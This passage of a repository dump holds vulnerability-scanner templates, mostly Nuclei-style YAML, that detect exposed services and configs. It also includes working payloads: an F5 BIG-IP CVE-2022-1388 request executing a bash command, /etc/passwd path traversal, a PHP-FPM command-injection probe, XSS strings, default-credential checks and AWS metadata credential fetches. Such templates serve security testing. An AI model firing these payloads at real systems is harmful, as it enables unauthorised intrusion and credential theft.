 7 |   - method: GET
 8 |     path:
 9 |       - "{{BaseURL}}/_fragment"
10 |     matchers-condition: and
11 |     matchers:
12 |       - type: status
13 |         status:
14 |           - 403
15 |       - type: word
16 |         words:
17 |           - "The Symfony Project"
18 |         part: all
19 | 


--------------------------------------------------------------------------------
/nuclei_pocs/kubernetes-api-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: kubernetes-api-detect
 2 | 
 3 | info:
 4 |   name: Kubernetes API Detection
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/pods/"
12 |       - "{{BaseURL}}:10250/pods/"
13 |       - "{{BaseURL}}:10255/pods/"
14 |     matchers:
15 |       - type: word
16 |         words:
17 |           - "PodList"
18 |         part: body
19 | 


--------------------------------------------------------------------------------
/nuclei_pocs/clickhouse-db-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: Clickhouse DB - Detect
 2 | 
 3 | info:
 4 |   name: Clickhouse DB - Detect
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/test"
12 |     matchers-condition: and
13 |     matchers:
14 |       - type: status
15 |         status:
16 |           - 404
17 |       - type: word
18 |         words:
19 |           - "clickhouse"
20 |         part: body	
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/display-via-header.yaml:
--------------------------------------------------------------------------------
 1 | id: display-via-header
 2 | 
 3 | info:
 4 |   name: Display Via Header
 5 |   author: geeknik
 6 |   reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Via
 7 |   severity: info
 8 |   tags: misc
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}"
14 | 
15 |     redirects: true
16 |     extractors:
17 |       - type: regex
18 |         part: header
19 |         regex:
20 |           - "Via:.*"
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/apache-druid-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: apache-druid-detect 
 2 | 
 3 | info:
 4 |   name: Apache Druid Detection
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/status/properties"
12 |       - "{{BaseURL}}:8091/status/properties"
13 |       - "{{BaseURL}}:8083/status/properties"
14 |     matchers:
15 |       - type: word
16 |         words:
17 |           - "druid.host"
18 |         part: body
19 | 


--------------------------------------------------------------------------------
/nuclei_pocs/docker-k8s.yaml:
--------------------------------------------------------------------------------
 1 | # info to search signature
 2 | id: docker-k8s
 3 | info:
 4 |   name: K8S API Exposed
 5 |   risk: High
 6 | 
 7 | requests:
 8 |   - method: GET
 9 |     redirect: false
10 |     url: >-
11 |      {{.BaseURL}}/info
12 |     detections:
13 |       - >-
14 |         StatusCode() == 200 && StringSearch("response", "KernelVersion") && StringSearch("response", "RegistryConfig")
15 | 
16 | reference:
17 |   - link: https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce


--------------------------------------------------------------------------------
/nuclei_pocs/exposed-hg.yaml:
--------------------------------------------------------------------------------
 1 | id: exposed-hg
 2 | 
 3 | info:
 4 |   name: Exposed HG Directory
 5 |   author: daffainfo
 6 |   severity: low
 7 |   tags: config,exposure
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}/.hg/hgrc"
13 | 
14 |     matchers-condition: and
15 |     matchers:
16 |       - type: word
17 |         words:
18 |           - "[paths]"
19 |           - "default"
20 |         condition: and
21 | 
22 |       - type: status
23 |         status:
24 |           - 200
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/php-ini.yaml:
--------------------------------------------------------------------------------
 1 | id: php-ini
 2 | 
 3 | info:
 4 |   name: php.ini
 5 |   author: geeknik
 6 |   severity: info
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/php.ini"
12 | 
13 |     matchers-condition: and
14 |     matchers:
15 |       - type: status
16 |         status:
17 |           - 200
18 |       - type: word
19 |         words:
20 |           - "[PHP]"
21 |           - "short_open_tag"
22 |           - "safe_mode"
23 |           - "expose_php"
24 |         condition: and
25 | 


--------------------------------------------------------------------------------
/F5 BIG-IP RCE exploitation (CVE-2022-1388).md:
--------------------------------------------------------------------------------
 1 | ## F5 BIG-IP RCE EXP [ CVE-2022-1388 ]
 2 | 
 3 | ```
 4 | POST /mgmt/tm/util/bash HTTP/1.1
 5 | Host:
 6 | Accept-Encoding: gzip, deflate
 7 | Accept: */*
 8 | Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host
 9 | Content-type: application/json
10 | X-F5-Auth-Token: anything
11 | Authorization: Basic YWRtaW46
12 | Content-Length: 42
13 | 
14 | {"command": "run", "utilCmdArgs": "-c id"}
15 | ```
16 | 


--------------------------------------------------------------------------------
/nuclei_pocs/tor-socks-proxy.yaml:
--------------------------------------------------------------------------------
 1 | id: tor-socks-proxy
 2 | info:
 3 |   name: Detect tor SOCKS proxy
 4 |   author: geeknik
 5 |   severity: info
 6 | 
 7 | requests:
 8 |   - method: GET
 9 |     path:
10 |       - '{{BaseURL}}'
11 | 
12 |     matchers-condition: and
13 |     matchers:
14 |       - type: word
15 |         words:
16 |           - "This is a SOCKS Proxy"
17 |           - "HTTPTunnelPort"
18 |           - "SOCKSPort"
19 |         condition: and
20 |       - type: status
21 |         status:
22 |           - 501
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-15004.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-15004
 2 | info:
 3 |   name: OX App Suite XSS
 4 |   risk: Medium
 5 |   author: '@GochaOqradze'
 6 |   
 7 | params:
 8 |   - root: '{{.BaseURL}}'
 9 | 
10 | 
11 | requests:
12 |   - method: GET
13 |     url: >-
14 |      {{.root}}/stats/diagnostic?param=%3Cscript%3Ealert(%27ayb%27);%3C/script%3E%22
15 |     detections:
16 |       - >-
17 |         RegexSearch("body", "<script>alert('ayb');</script>")
18 |         
19 | reference:
20 |   - link: https://seclists.org/fulldisclosure/2020/Oct/20


--------------------------------------------------------------------------------
/nuclei_pocs/fps-config.yaml:
--------------------------------------------------------------------------------
 1 | id: fps-config
 2 | 
 3 | info:
 4 |   name: FrontPage Server Config Exposure
 5 |   author: nullenc0de
 6 |   severity: critical
 7 |   description: FrontPage Server Config Exposure
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}/_vti_pvt/service.pwd"
13 | 
14 |     matchers-condition: and
15 |     matchers:
16 |       - type: status
17 |         status:
18 |           - 200
19 |       - type: word
20 |         words:
21 |           - "# -FrontPage-"
22 |         part: body
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/kafka-misconfig.yaml:
--------------------------------------------------------------------------------
 1 | id: kafka-misconfig
 2 | info:
 3 |   name: Kafka Manger Misconfig
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("response", "Kafka Manager") && StringSearch("body", "/addCluster")


--------------------------------------------------------------------------------
/nuclei_pocs/pi-hole-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: pi-hole-detect
 2 | info:
 3 |   name: pi-hole detector
 4 |   author: geeknik
 5 |   severity: info
 6 | 
 7 | requests:
 8 |   - method: GET
 9 |     path:
10 |       - "{{BaseURL}}/admin/index.php"
11 | 
12 |     matchers-condition: and
13 |     matchers:
14 |       - type: status
15 |         status:
16 |           - 200
17 |       - type: word
18 |         words:
19 |           - "Pi-hole"
20 |           - "Web Interface"
21 |           - "FTL"
22 |         part: body
23 |         condition: and
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/aws-metadata.yaml:
--------------------------------------------------------------------------------
 1 | id: aws-metadata
 2 | 
 3 | info:
 4 |   name: AWS Metadata
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role"
12 |       - "{{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"
13 |     matchers:
14 |       - type: word
15 |         words:
16 |           - "AccessKeyId"
17 |         condition: or
18 |         part: body
19 | 


--------------------------------------------------------------------------------
/nuclei_pocs/host-header-injection.yaml:
--------------------------------------------------------------------------------
 1 | # info to search signature
 2 | id: host-header-injection
 3 | type: fuzz
 4 | info:
 5 |   name: Host Header Injection
 6 |   risk: Medium
 7 | 
 8 | 
 9 | variables:
10 |   - head: |
11 |       Host
12 |   - dest: 'cvebase.com'
13 | 
14 | payloads:
15 |   - "{{.dest}}"
16 | 
17 | requests:
18 |   - method: GET
19 |   - generators:
20 |       - Header("{{.payload}}", "{{.head}}")
21 |     detections:
22 |       - >-
23 |         RegexSearch("resHeaders", "(?m)^(L|l)ocation: ((http|https)://)?{{.dest}}")
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/SquirrelMail.yaml:
--------------------------------------------------------------------------------
 1 | id: Squirrelmail Login
 2 | 
 3 | info:
 4 |   name: CVE-2017-7692 Squirrelmail Remote Code Execution
 5 |   author: Zin Min Phyo fb.com/zinminphy0 @zin_min_phyo
 6 |   severity: Info
 7 |   tags:  injection
 8 | 
 9 |   
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/squirrelmail/src/login.php"
14 |       - "{{BaseURL}}//webmail/src/login.php"
15 | 
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "SquirrelMail version 1.4."
20 |         part: body
21 | 
22 | 
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/admin-file-search.yaml:
--------------------------------------------------------------------------------
 1 | id: admin-file-search
 2 | 
 3 | info:
 4 |   name: Admin Path Disclosure
 5 |   author: Zin Min Phyo fb.com/zinminphy0 @zin_min_phyo
 6 |   severity: medium
 7 |   tags:  disclosure,sensitive,data
 8 | 
 9 |   
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/crx/de/filesearch.jsp;%0A.css?name=admin"
14 |       - "{{BaseURL}}/crx/de/filesearch.jsp?name=admin"
15 |        
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "jcr:path"
20 |         part: body
21 | 
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/clickhouse-db-unauth.yaml:
--------------------------------------------------------------------------------
 1 | id: Clickhouse DB - Unauthenticated
 2 | 
 3 | info:
 4 |   name: Clickhouse DB - Unauthenticated
 5 |   author: notnotnotveg
 6 |   severity: high
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/?query=SELECT%20314159"
12 |       - "{{BaseURL}}:8123/?query=SELECT%20314159"
13 |     matchers-condition: and
14 |     matchers:
15 |       - type: status
16 |         status:
17 |           - 200
18 |       - type: word
19 |         words:
20 |           - "314159"
21 |         part: body
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/exposed-darcs.yaml:
--------------------------------------------------------------------------------
 1 | id: exposed-darcs
 2 | 
 3 | info:
 4 |   name: Exposed Darcs Config
 5 |   author: daffainfo
 6 |   severity: low
 7 |   reference: http://darcs.net/Using/Configuration#sources
 8 |   tags: config,exposure
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/_darcs/prefs/binaries"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "Binary file regexps"
20 | 
21 |       - type: status
22 |         status:
23 |           - 200
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/htpasswd-detection.yaml:
--------------------------------------------------------------------------------
 1 | id: htpasswd
 2 | 
 3 | info:
 4 |   name: Detect exposed .htpasswd files
 5 |   author: geeknik
 6 |   severity: info
 7 |   tags: config,exposure
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}/.htpasswd"
13 | 
14 |     matchers-condition: and
15 |     matchers:
16 |       - type: word
17 |         words:
18 |           - ":{SHA}"
19 |           - ":$apr1$"
20 |           - ":$2y$"
21 |         condition: or
22 | 
23 |       - type: status
24 |         status:
25 |           - 200
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/php-fpm-status.yaml:
--------------------------------------------------------------------------------
 1 | id: php-fpm-status
 2 | 
 3 | info:
 4 |   name: PHP-FPM Status
 5 |   author: geeknik
 6 |   severity: info
 7 |   tags: config
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}/status?full"
13 | 
14 |     matchers-condition: and
15 |     matchers:
16 |       - type: word
17 |         words:
18 |           - 'pool:'
19 |           - 'process manager:'
20 |           - 'start time:'
21 |           - 'pid:'
22 |         condition: and
23 |       - type: status
24 |         status:
25 |           - 200
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/hadoop-unauth.yaml:
--------------------------------------------------------------------------------
 1 | id: hadoop-unauth
 2 | info:
 3 |   name: hadoop unauth
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/ws/v1/cluster/info
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("response", "hadoopVersion") && StringSearch("response", "resourceManagerVersionBuiltOn")
19 | 


--------------------------------------------------------------------------------
/nuclei_pocs/npmrc.yaml:
--------------------------------------------------------------------------------
 1 | id: npmrc
 2 | 
 3 | info:
 4 |   name: Detect .npmrc
 5 |   author: geeknik
 6 |   description: npm registry authentication data
 7 |   severity: high
 8 |   tags: npm,auth
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/.npmrc"
14 |     matchers-condition: and
15 |     matchers:
16 |       - type: word
17 |         part: header
18 |         words:
19 |           - "text/plain"
20 |       - type: word
21 |         words:
22 |           - "_auth="
23 |       - type: status
24 |         status:
25 |           - 200
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-14750.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-14750
 2 | info:
 3 |   name: Weblogic Auth Bypass
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}//console/images/%252e./console.portal
14 |     detections: 
15 |       - >-
16 |         StatusCode() == 200 && StringSearch("response", "common/NoJMX.jsp") && StringSearch("resHeaders","ADMINCONSOLESESSION")
17 |   
18 | reference:
19 |   - link: https://www.oracle.com/security-alerts/alert-cve-2020-14750.html


--------------------------------------------------------------------------------
/nuclei_pocs/connect-proxy.yaml:
--------------------------------------------------------------------------------
 1 | id: connect-proxy-enabled
 2 | 
 3 | info:
 4 |   name: proxy via connect method
 5 |   author: panch0r3d
 6 |   severity: medium
 7 | 
 8 | # https://www.securityfocus.com/bid/4131/discuss
 9 | 
10 | requests:
11 |   - raw:
12 |       - |
13 |         CONNECT www.example.com HTTP/1.1
14 |         Content-Type: text/plain
15 | 
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: status
19 |         status:
20 |           - 200
21 | 
22 |       - type: word
23 |         words:
24 |           - Example Domain
25 |           
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/schneider-lights.yaml:
--------------------------------------------------------------------------------
 1 | id: powerlinkg3-default-credential
 2 | info:
 3 |   name: powerlinkg3 Default Credentials Check
 4 |   author: grant
 5 |   severity: high
 6 | 
 7 | requests:
 8 |   - method: GET
 9 |     path:
10 |       - "http://{{BaseURL}}/zone_status.htm?b"
11 |     headers:
12 |       Authorization: "Basic YWRtaW46YWRtaW4="
13 |     matchers-condition: and
14 |     matchers:
15 |       - type: word
16 |         words:
17 |           - "Powerlink G3 Zone Status"
18 |         part: all
19 |       - type: status
20 |         status:
21 |           - 200
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/zeroshell-kerbynet-lfd.yaml:
--------------------------------------------------------------------------------
 1 | id: zeroshell-kerbynet-lfd
 2 | 
 3 | info:
 4 |   name: ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure
 5 |   author: geeknik
 6 |   reference: https://www.exploit-db.com/exploits/28558
 7 |   severity: high
 8 |   tags: zeroshell,kerbynet,lfd
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../etc/passwd"
14 | 
15 |     matchers:
16 |       - type: regex
17 |         part: body
18 |         regex:
19 |           - "root:[x*]:0:0:"
20 | 


--------------------------------------------------------------------------------
/nuclei_pocs/kong-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: kong-detect
 2 | info:
 3 |   name: Detect Kong
 4 |   author: geeknik
 5 |   description: The Cloud-Native API Gateway - https://github.com/Kong/kong
 6 |   severity: info
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}"
12 | 
13 |     matchers-condition: and
14 |     matchers:
15 | 
16 |       - type: regex
17 |         part: header
18 |         regex:
19 |           - "[Ss]erver: [Kk]ong+"
20 | 
21 |     extractors:
22 |       - type: kval
23 |         part: header
24 |         kval:
25 |           - server
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/rocketmq-console.yaml:
--------------------------------------------------------------------------------
 1 | id: rocketmq-console-unauth
 2 | info:
 3 |   name: RocketMq Console Unauth
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/cluster/list.query
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("response", "putMessageDistributeTime") && StringSearch("response", "runtime")
19 | 


--------------------------------------------------------------------------------
/nuclei_pocs/simple-xss.yaml:
--------------------------------------------------------------------------------
 1 | # info to search signature
 2 | id: simple-xss
 3 | 
 4 | type: fuzz
 5 | info:
 6 |   name: XSS Fuzz
 7 |   risk: High
 8 | 
 9 | # origin: gonna come from Burp
10 | payloads:
11 |     - abc<xsshere>abc
12 |     
13 | requests:
14 |   - redirect: true
15 |   - generators:
16 |       # Change exist content type or adding new one
17 |       - Query("[[.original]]{{.payload}}")
18 |       - Path("[[.original]]{{.payload}}", "*")
19 |     detections:
20 |       - >-
21 |         StatusCode() != 301 && StatusCode() != 302 && StringSearch("response", "<xsshere>")
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-11043.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-11043
 2 | info:
 3 |   name: PHP RCE
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 | requests: 
11 |   - method: GET
12 |     url: >-
13 |       {{.root}}/?a=/bin/sh+-c+'which+which'&
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
16 |     detections:
17 |       - >-
18 |         StringSearch("resBody", "/bin/which") 
19 | references:
20 |   - https://www.cvebase.com/cve/2019/11043
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/apache-nifi-unauth.yaml:
--------------------------------------------------------------------------------
 1 | id: Apache Nifi-Unauthenticated
 2 | 
 3 | info:
 4 |   name: Apache Nifi-Unauthenticated
 5 |   author: notnotnotveg
 6 |   severity: informative
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/nifi-api/flow/current-user"
12 |     matchers-condition: and
13 |     matchers:
14 |       - type: word
15 |         words:
16 |           - "identity"
17 |         part: body
18 |     condition: and
19 |     extractors:
20 |       - type: regex
21 |         part: body
22 |         regex:
23 |           - "\"identity\":\"(.*?)\""
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/laravel-telescope-exposed.yaml:
--------------------------------------------------------------------------------
 1 | id: laravel-telescope-exposed
 2 | info:
 3 |   name: Laravel Telescope Exposed
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/telescope/requests
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("body", "<title>Telescope</title>") && StringSearch("body", "Schedule") 
19 | 


--------------------------------------------------------------------------------
/nuclei_pocs/tox-ini.yaml:
--------------------------------------------------------------------------------
 1 | id: tox-ini
 2 | 
 3 | info:
 4 |   name: Detect tox.ini
 5 |   author: geeknik
 6 |   reference: https://tox.readthedocs.io/en/latest/config.html
 7 |   severity: high
 8 |   tags: tox,config,aws,auth
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/tox.ini"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "AWS_ACCESS_KEY_ID"
20 |           - "AWS_SECRET_ACCESS_KEY"
21 |         condition: and
22 |       - type: status
23 |         status:
24 |           - 200
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/basic-auth-detection.yaml:
--------------------------------------------------------------------------------
 1 | id: basic-auth-detection
 2 | 
 3 | info:
 4 |   name: Basic auth detection
 5 |   author: esetal
 6 |   severity: info
 7 |   tags: tech,basic-auth
 8 |   description: improved version of nuclei-templates/technologies/basic-auth-detection.yaml
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: status
18 |         status:
19 |           - 401
20 |       - type: dsl
21 |         dsl:
22 |           - contains(tolower(all_headers), 'www-authenticate')
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/zipkin-unauth.yaml:
--------------------------------------------------------------------------------
 1 | id: zippkin-unauth
 2 | info:
 3 |   name: zippkin unauth
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/config.json
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("response", "{"environment"") && StringSearch("response", "defaultLookback") && StringSearch("resHeaders", "application/json")


--------------------------------------------------------------------------------
/nuclei_pocs/terraform-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: terraform-detect
 2 | info:
 3 |   name: Detect Terraform Provider
 4 |   author: geeknik
 5 |   description: Write Infrastructure as Code - https://www.terraform.io/
 6 |   severity: info
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/provider.tf"
12 | 
13 |     matchers-condition: and
14 |     matchers:
15 |       - type: word
16 |         part: body
17 |         words:
18 |           - access_key
19 |           - terraform
20 |         condition: and
21 | 
22 |       - type: status
23 |         status:
24 |           - 200
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/elasticsearch-cluster-health.yaml:
--------------------------------------------------------------------------------
 1 | id: elasticsearch-cluster-health
 2 | 
 3 | info:
 4 |   name: ElasticSearch Cluster Health
 5 |   author: geeknik
 6 |   severity: low
 7 |   tags: elasticsearch
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}/_cluster/health?pretty"
13 | 
14 |     matchers-condition: and
15 |     matchers:
16 |       - type: status
17 |         status:
18 |           - 200
19 |       - type: word
20 |         words:
21 |           - '"cluster_name" :'
22 |           - '"status" :'
23 |           - '"timed_out" :'
24 |         condition: and
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/joomla-host-injection.yaml:
--------------------------------------------------------------------------------
 1 | # info to search signature
 2 | id: joomla-host-injection
 3 | info:
 4 |   name: Joomla Host header Injection
 5 |   risk: Medium
 6 | 
 7 | requests:
 8 |   - method: GET
 9 |     redirect: true
10 |     url: >-
11 |      {{.BaseURL}}
12 |     headers:
13 |       - Host: whateveruniqqe.com
14 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
15 |     detections:
16 |       - >-
17 |         StringSearch("response", "whateveruniqqe.com")
18 | 
19 | reference:
20 |   - link: https://0day.life/exploit/0day-1247.html
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/wordpress-rest-api.yaml:
--------------------------------------------------------------------------------
 1 | id: wordpress-rest-api
 2 | info:
 3 |   name: Wordpress REST API Exposed
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - vul: |
11 |       wp-json/
12 | requests:
13 |   - method: GET
14 |     redirect: false
15 |     url: >-
16 |       {{.root}}/{{.vul}}
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch("response", "routes")
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/iis-directory-listing.yaml:
--------------------------------------------------------------------------------
 1 | id: iis-directory-listing
 2 | info:
 3 |   name: IIS Directory Listing
 4 |   risk: Low
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | variables:
10 |   - end: |
11 |       /
12 |       /aspnet_client/
13 |       /App_Data/
14 | requests:
15 |   - method: GET
16 |     url: >-
17 |       {{.root}}{{.end}}
18 |     headers:
19 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 |     detections:
21 |       - >-
22 |         StatusCode() == 200 && RegexSearch("body", "<\/title><\/head><body><H1>.*-.*<\/H1><hr>")
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/redis-conf.yaml:
--------------------------------------------------------------------------------
 1 | id: redis-conf
 2 | 
 3 | info:
 4 |   name: Redis Configuration File
 5 |   author: geeknik
 6 |   description:
 7 |   severity: high
 8 |   tags: redis,config
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/redis.conf"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "Redis configuration file example"
20 |           - "INCLUDES"
21 |           - "MODULES"
22 |           - "NETWORK"
23 |         condition: and
24 |       - type: status
25 |         status:
26 |           - 200
27 | 


--------------------------------------------------------------------------------
/nuclei_pocs/globalprotect-xss.yaml:
--------------------------------------------------------------------------------
 1 | id: globalprotect-xss
 2 | info:
 3 |   name: Global Protect XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/global-protect/login.esp?user=j%22;-alert(1)-%22x
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("response", 'var valueUser = "j";-alert(1)-"x";') && StringSearch("resHeaders", "text/html")
19 | 


--------------------------------------------------------------------------------
/nuclei_pocs/host-header-auth-bypass.yaml:
--------------------------------------------------------------------------------
 1 | id: host-header-auth-bypass
 2 | info:
 3 |   name: Auth bypass via localhost host header
 4 |   author: esetal
 5 |   severity: info
 6 | 
 7 | requests:
 8 |   - raw:
 9 |       - |
10 |         GET / HTTP/1.1
11 |         Host: {{Hostname}}
12 | 
13 |       - |
14 |         GET / HTTP/1.1
15 |         Host: localhost
16 | 
17 |       - |
18 |         GET / HTTP/1.1
19 |         Host: nonsense
20 | 
21 |     req-condition: true
22 |     matchers:
23 |       - type: dsl
24 |         dsl:
25 |           - "status_code_1 != 200 && status_code_2 == 200 && status_code_3 != 200"
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-7192.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-7192
 2 | info:
 3 |   name: QNAP Photo Station RCE
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       photo/p/api/video.php
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 401
21 | references:
22 |   - https://www.cvebase.com/cve/2019/7192
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/header-blind-ssrf.yaml:
--------------------------------------------------------------------------------
 1 | id: header-blind-ssrf
 2 | 
